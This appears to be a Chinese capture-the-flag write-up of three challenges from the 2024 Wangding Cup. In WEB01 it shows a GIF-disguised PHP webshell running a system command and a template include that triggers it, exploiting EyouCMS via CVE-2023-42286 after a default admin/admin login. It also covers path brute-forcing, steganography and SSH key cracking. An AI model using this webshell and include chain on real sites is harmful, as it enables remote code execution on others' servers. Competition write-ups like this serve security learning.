2024网鼎杯玄武组WP

文摘   2024-11-07 13:12   云南  

本次参加了网鼎杯玄武组的比赛,大佬云集,我们队伍就解出了三道题目,重在参与!

WEB01

使用默认密码登录后台 admin/admin

通过网上搜索到公开的漏洞 https://github.com/Nacl122/CVEReport/blob/main/CVE-2023-42286/EyouCMS%20Backend%20RCE.md

进行测试

构造一个图片马

  • 1

  • 2

GIF89a  
<?php eval(system("cat ../../../flag.txt"));?>

上传

  • 1

{eyou:include file="uploads/allimg/20241104/1-241104123542928.gif" /}

找到模板功能,将文件包含到index.html中

接着访问首页就可以获取到flag

WEB03

利用 dirb 工具爆破 web 路径,发现存在 robots.txt,利用 username

和 password 登录系统发现需要私钥登录。

下载 wbStego4.bmp 文件,利用 ctf 工具读取图片信息,结合图片名称,发现图片存在隐写,利用 wbs43open 工具读取隐写信息


隐写信息疑似ssh公钥,将该值复制到单独的id_rsa文件中,并修改为标准的公钥格式,并利用rsacracker工具爆破私钥

新建私钥文件id_rsa并利用私钥登录获取flag

REVERSE02

下载题目是一个jar文件,加载到idea分析,发现是aes加密

解密

附上部分题目

  • 1

  • 2

  • 3

2024网鼎杯玄武部分题目.zip
链接:https://pan.baidu.com/s/1VG7WKmyKUdT-xM-OE0JP4Q?pwd=y426
提取码:y426


安全逐梦人
渗透实战知识分享,漏洞复现,代码审计,安全工具分享